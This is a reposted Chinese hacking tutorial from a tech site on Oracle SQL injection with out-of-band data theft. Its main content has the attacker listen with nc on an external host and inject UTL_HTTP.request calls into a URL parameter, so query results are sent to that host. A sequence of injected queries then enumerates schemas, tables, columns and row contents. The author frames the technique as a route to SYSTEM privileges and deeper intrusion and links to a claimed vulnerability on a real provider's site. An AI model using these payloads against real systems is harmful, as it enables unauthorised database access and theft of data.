安基网 首页 电脑 电脑学堂 查看内容

Oracle注射技术——Oracle+nc注射

2009-5-2 11:22| 投稿: computer


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 作者:KindleMSN :Kindle@live.cnBlog:http://hi.baidu.com/system_expTeam:反安全技术小组 (http://bbs.exploits.com...
作者:KindleMSN :Kindle@live.cnBlog:http://hi.baidu.com/system_expTeam:反安全技术小组 (http://bbs.exploits.com.cn) 首先外网nc监听对应的端口 url语句简单如下所示: http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1-- 内容如下: and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--爆库: select owner from all_tables where rownum=1 select owner from all_tables where owner<>'第一个库名' and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第二个'and rownum=1 select owner from all_tables where owner<>'第一个库名' and owner<>'第一个库名' and rownum=1 以此论推 爆表: select TABLE_NAME from all_tables where owner='库名'and rownum=1 select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2' 以此论推 爆列: select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名' 爆内容: 第一个内容:select 列名 from 表名 where rownum=1 第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' 第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值' 以此论推 现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光”http://bbs.exploits.com.cn/read.php?tid-144.html 是不是很明了了...o(∩_∩)o...哈哈 注:1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁3.这是个系列文章,后文有待更新  

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

 最新
返回顶部